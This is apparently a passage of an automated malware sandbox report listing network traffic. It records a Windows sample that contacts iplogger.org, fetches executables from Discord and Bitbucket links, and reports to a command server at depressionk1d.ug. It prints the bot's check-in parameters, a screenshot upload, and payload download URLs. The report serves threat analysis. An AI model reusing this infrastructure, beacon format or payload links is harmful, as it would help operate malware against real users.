                                                                                                                                                                                Nov 11, 2021 12:27:35.290884018 CET4434986988.99.66.31192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.290898085 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:35.290968895 CET49869443192.168.2.588.99.66.31
                                                                                                                                                                                Nov 11, 2021 12:27:39.566019058 CET8049867178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:39.566190958 CET4986780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:43.635739088 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:43.635775089 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:43.635848045 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:43.636096001 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:43.636110067 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:43.963521004 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:43.964607954 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:43.968461037 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:43.968477964 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:43.968998909 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:43.971259117 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:43.972078085 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:44.012871027 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:44.158031940 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:44.158134937 CET44349874104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:44.158715010 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:44.212707996 CET49874443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:44.212757111 CET44349874104.192.141.1192.168.2.5

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 11, 2021 12:26:02.942133904 CET5959653192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:02.960319996 CET53595968.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:10.489849091 CET5696953192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:10.509869099 CET53569698.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:23.148817062 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:23.176404953 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:24.614253998 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:25.638576031 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:25.655350924 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:31.703944921 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:31.722537994 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:47.585407972 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:47.604258060 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:48.442755938 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:48.463788986 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:52.391477108 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:52.411010027 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:26:55.082498074 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:26:55.106424093 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:35.072468042 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:27:35.096999884 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:43.610899925 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                Nov 11, 2021 12:27:43.631196022 CET53605168.8.8.8192.168.2.5

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                Nov 11, 2021 12:26:02.942133904 CET192.168.2.58.8.8.80xe3baStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:10.489849091 CET192.168.2.58.8.8.80xa85fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:23.148817062 CET192.168.2.58.8.8.80xab79Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:24.614253998 CET192.168.2.58.8.8.80x6b14Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:25.638576031 CET192.168.2.58.8.8.80x6b14Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:31.703944921 CET192.168.2.58.8.8.80x8d90Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:47.585407972 CET192.168.2.58.8.8.80x6a26Standard query (0)depressionk1d.ugA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:48.442755938 CET192.168.2.58.8.8.80xb267Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:52.391477108 CET192.168.2.58.8.8.80xd566Standard query (0)bitbucket.orgA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:55.082498074 CET192.168.2.58.8.8.80xd1b2Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:27:35.072468042 CET192.168.2.58.8.8.80x641dStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:27:43.610899925 CET192.168.2.58.8.8.80xa816Standard query (0)bitbucket.orgA (IP address)IN (0x0001)

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                Nov 11, 2021 12:26:02.960319996 CET8.8.8.8192.168.2.50xe3baNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:02.960319996 CET8.8.8.8192.168.2.50xe3baNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:02.960319996 CET8.8.8.8192.168.2.50xe3baNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:02.960319996 CET8.8.8.8192.168.2.50xe3baNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:02.960319996 CET8.8.8.8192.168.2.50xe3baNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:10.509869099 CET8.8.8.8192.168.2.50xa85fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:10.509869099 CET8.8.8.8192.168.2.50xa85fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:10.509869099 CET8.8.8.8192.168.2.50xa85fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:10.509869099 CET8.8.8.8192.168.2.50xa85fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:10.509869099 CET8.8.8.8192.168.2.50xa85fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:23.176404953 CET8.8.8.8192.168.2.50xab79No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:25.655350924 CET8.8.8.8192.168.2.50x6b14No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:25.655350924 CET8.8.8.8192.168.2.50x6b14No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:25.655350924 CET8.8.8.8192.168.2.50x6b14No error (0)s3-w.us-east-1.amazonaws.com52.216.1.8A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:31.722537994 CET8.8.8.8192.168.2.50x8d90No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:47.604258060 CET8.8.8.8192.168.2.50x6a26No error (0)depressionk1d.ug178.208.83.45A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:48.463788986 CET8.8.8.8192.168.2.50xb267No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:48.463788986 CET8.8.8.8192.168.2.50xb267No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:48.463788986 CET8.8.8.8192.168.2.50xb267No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:48.463788986 CET8.8.8.8192.168.2.50xb267No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:48.463788986 CET8.8.8.8192.168.2.50xb267No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:52.411010027 CET8.8.8.8192.168.2.50xd566No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:26:55.106424093 CET8.8.8.8192.168.2.50xd1b2No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:27:35.096999884 CET8.8.8.8192.168.2.50x641dNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                                                Nov 11, 2021 12:27:43.631196022 CET8.8.8.8192.168.2.50xa816No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • cdn.discordapp.com
                                                                                                                                                                                • bitbucket.org
                                                                                                                                                                                • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                • iplogger.org
                                                                                                                                                                                • depressionk1d.ug

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.2.549765162.159.129.233443C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.2.549770162.159.129.233443C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                10192.168.2.549815104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                11192.168.2.549846104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                12192.168.2.549848162.159.135.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                13192.168.2.549855104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                14192.168.2.549857104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                15192.168.2.549866104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                16192.168.2.54986988.99.66.31443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                17192.168.2.549874104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                18192.168.2.54978288.99.66.3180C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:31.765022039 CET12028OUTGET /1fEwd7 HTTP/1.1
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                MySpecialHeder: whatever
                                                                                                                                                                                User-Agent: Run
                                                                                                                                                                                Host: iplogger.org
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:31.787024975 CET12029INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:31 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Location: https://iplogger.org/1fEwd7
                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                Last-Modified: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                19192.168.2.549790178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:47.709564924 CET14662OUTPOST /k8FppT/index.php HTTP/1.1
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 83
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 34 31 34 34 30 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                                                                Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=414408&un=user&dm=&av=13&lv=0
                                                                                                                                                                                Nov 11, 2021 12:26:47.760720968 CET14702INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:47 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                X-Powered-By: PHP/5.6.37
                                                                                                                                                                                Data Raw: 63 37 0d 0a 3c 63 3e 31 30 30 30 30 39 36 30 30 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 38 37 38 30 33 34 32 30 36 35 37 30 32 30 39 33 33 33 2f 39 30 37 39 39 32 35 33 37 38 32 34 39 30 37 32 38 34 2f 76 6d 73 2e 65 78 65 23 31 30 30 30 30 39 38 30 30 31 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 38 37 38 30 33 34 32 30 36 35 37 30 32 30 39 33 33 33 2f 39 30 38 30 39 37 36 35 35 31 37 33 39 34 37 34 33 32 2f 73 6c 68 6f 73 74 2e 65 78 65 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: c7<c>1000096001https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe#1000098001https://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe#<d>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                2192.168.2.549774104.192.141.1443C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                20192.168.2.549791178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:47.710017920 CET14662OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----fa09649961c5c38096ee815c1084b2f0
                                                                                                                                                                                Host: depressionk1d.ug
                                                                                                                                                                                Content-Length: 90930
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Nov 11, 2021 12:26:47.710181952 CET14662OUTData Raw: 2d 2d 2d 2d 2d 2d 66 61 30 39 36 34 39 39 36 31 63 35 63 33 38 30 39 36 65 65 38 31 35 63 31 30 38 34 62 32 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                                                                                                                Data Ascii: ------fa09649961c5c38096ee815c1084b2f0Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                                                                                                                                Nov 11, 2021 12:26:47.710369110 CET14673OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                                                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                                                                                                                Nov 11, 2021 12:26:47.710459948 CET14675OUTData Raw: 34 8d 8c 9f 41 ea 7e 95 8b 1f 8f 7c 31 2c a2 35 d5 50 31 e3 2d 13 a8 fc ca e2 b2 74 3d 3a 3d 7d 5f c5 3e 21 09 22 36 e6 b6 82 53 98 e0 88 13 c9 07 83 d3 bf d6 ad db f8 a3 c2 5a cd c8 d2 c0 85 fc c3 b1 16 5b 7c 23 9e c0 64 7e 55 4b 0f 08 dd 34 e4
                                                                                                                                                                                Data Ascii: 4A~|1,5P1-t=:=}_>!"6SZ[|#d~UK4~2x5_,w7p]Z\|{)q_4|J?-XYHKgp8^gjZneaqGhF18<1yQXTJk4tyQ[Q@((()y
                                                                                                                                                                                Nov 11, 2021 12:26:47.735490084 CET14678OUTData Raw: b5 00 21 a4 a7 52 11 40 c4 a2 8a 5e d4 80 4c 51 45 2f 34 58 04 a5 a2 8a 68 04 a2 96 8c 52 00 e6 8e 68 e6 8a 60 25 14 a6 8a 56 01 28 a5 a2 80 b9 1d 7a 77 c0 9c ff 00 c2 c0 93 1d 4d 84 b8 ff 00 be 96 bc c6 ac 5a 5f 5d d8 4a 65 b3 ba 9e da 42 bb 4b
                                                                                                                                                                                Data Ascii: !R@^LQE/4XhRh`%V(zwMZ_]JeBK!BGGnYs&?%jq,wLnJ2g8+~&5naIx8"]OUXfHv+2{i&i[<YnIRgw?ZI,[2
                                                                                                                                                                                Nov 11, 2021 12:26:47.735524893 CET14681OUTData Raw: e3 a9 9e 52 93 9e f5 ad 48 b9 46 c8 ce 12 51 95 d9 e8 73 7d 84 68 ba 9b 6a 37 77 b6 d0 24 5a 13 09 2c e1 59 24 c8 b5 6e 00 67 50 3e b9 38 f4 34 69 1a 84 9a 85 d6 a5 a9 dc f9 56 4f ad 5f 48 da 2c 72 29 6f 2a ef 0d fb c0 d9 00 01 b9 50 b1 18 dc ca
                                                                                                                                                                                Data Ascii: RHFQs}hj7w$Z,Y$ngP>84iVO_H,r)o*PqjNH]w5u:-|sU;{vJ}*WQx0?A 2sGae#_NZzP~o4-W!'<ay-52[
                                                                                                                                                                                Nov 11, 2021 12:26:47.735553980 CET14684OUTData Raw: 0b 2b c9 a0 bc d3 af e1 b7 82 d5 ae de f5 fc 96 8f ca 51 f7 88 57 2e 33 d0 02 a3 24 1c 74 35 37 86 bc 55 a7 f8 a6 0b 89 2c 72 a6 06 0a e8 66 86 5c 64 64 1d d1 3b af af 19 cf 1c 8a 00 dc a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00
                                                                                                                                                                                Data Ascii: +QW.3$t57U,rf\dd;((((((-WFS%VZ:~K/q=_ujd7R@F)qKP(;"RX.&)1Nb\Q`(?b1E>Q`)jLRH.FE!&)b#&*\SqSbG1RbVb
                                                                                                                                                                                Nov 11, 2021 12:26:47.735625029 CET14686OUTData Raw: 07 90 38 23 90 7a 1a b8 ca 19 4a b0 c8 23 04 57 21 e0 76 49 26 d4 a6 de 09 6f 2a 18 b3 c1 92 18 94 a2 c9 f8 90 df 88 ae 49 4d a9 c6 3d ce 9a 34 23 3a 15 2a 3b de 36 b7 cd ff 00 91 d2 ea 7a 65 a6 af 61 25 9d e4 42 48 5c 7e 20 f6 20 f6 35 f3 0f c4
                                                                                                                                                                                Data Ascii: 8#zJ#W!vI&o*IM=4#:*;6zea%BH\~ 57u01$z',RWaR|*R&VztI[ )hhGz0i)@.h% (1R@EJ\PhQE;(- Q@R%-SGz
                                                                                                                                                                                Nov 11, 2021 12:26:47.735647917 CET14689OUTData Raw: ca d3 4a d4 e5 69 85 2b a5 c4 85 22 12 29 85 6a 72 b4 d2 2b 37 12 d3 20 2b 4d 22 a7 22 98 45 4b 45 a6 44 45 36 a4 22 9a 45 4d 8a 4c 61 14 98 a7 e2 92 a4 ab 8d c5 25 3a 8a 43 1b 45 29 a4 a0 04 ef 41 a2 8a 43 0a 31 40 a0 d0 01 8a 6e 29 f4 86 95 86
                                                                                                                                                                                Data Ascii: Ji+")jr+7 +M""EKEDE6"EMLa%:CE)AC1@n)UL/uj[RVpb1~n-#x4={GIupGDu'}/MI\?YEdBYX?{+z5vt?u`{:ZQQ
                                                                                                                                                                                Nov 11, 2021 12:26:47.735678911 CET14692OUTData Raw: ff 00 03 f1 3a 89 c5 83 49 25 f4 96 fa 65 d6 a9 a6 e9 02 e2 ea de c8 46 6d 5e 73 30 45 24 45 f2 36 d8 dd 59 82 fc a4 8e 7f 88 57 29 7b a9 4f a9 c9 1c b7 10 d9 c7 22 ae 33 6b 6d 1c 01 87 ba c6 02 e7 df 19 f5 ed 4d d3 ae ee b4 9b b8 ee f4 f9 da 0b
                                                                                                                                                                                Data Ascii: :I%eFm^s0E$E6YW){O"3kmMx )Au/uJXK{hAvx)2s[iW.olekM:)vye)=IU[+{24m1'dRI 3F['Sr+1YjZIq:9n
                                                                                                                                                                                Nov 11, 2021 12:26:47.735728025 CET14696OUTData Raw: 40 a6 20 a5 a2 94 53 24 70 14 b4 9d a9 45 59 23 85 38 75 a4 a5 14 d1 23 e9 45 25 2d 59 03 81 a7 83 4c 1d 69 6a 91 2c 94 35 38 35 43 4e cd 3b 92 d1 26 14 f5 a6 98 11 ba 50 0e 29 c1 a8 b2 62 bb 5b 11 1b 5f 43 4c 30 32 f6 cd 5b 0f 4f 0c 0d 1c a8 3d
                                                                                                                                                                                Data Ascii: @ S$pEY#8u#E%-YLij,585CN;&P)b[_CL02[O=6zqG({TPFt&^X4v1@7jLQ,+1J|cFb)A{EQMDbt#T1mMc*feUGZ@W<f0^xJPE79ZaZH!
                                                                                                                                                                                Nov 11, 2021 12:26:47.817188025 CET14757INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:47 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                X-Powered-By: PHP/5.6.37


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                21192.168.2.549792162.159.135.23380C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:48.673430920 CET14758OUTGET /attachments/878034206570209333/907992537824907284/vms.exe HTTP/1.1
                                                                                                                                                                                Host: cdn.discordapp.com
                                                                                                                                                                                Nov 11, 2021 12:26:48.701754093 CET14759INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                Date: Thu, 11 Nov 2021 11:26:48 GMT
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                Expires: Thu, 11 Nov 2021 12:26:48 GMT
                                                                                                                                                                                Location: https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe
                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AHxmT2ES134tyCf7ROAvRvx9%2FeiEhPm%2FUsMr757%2BZgTBN1nA2PiDse0NsMVHkCC0xh2gsDKWq8HuRM58yMIAB3z1G8c6nRFcKzmtVJbxoVzaWC7pyhcNrXxUWRVvrdKsxwfrbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 6ac72af23a8c145a-FRA
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                22192.168.2.549793178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Nov 11, 2021 12:26:49.121181965 CET14760OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
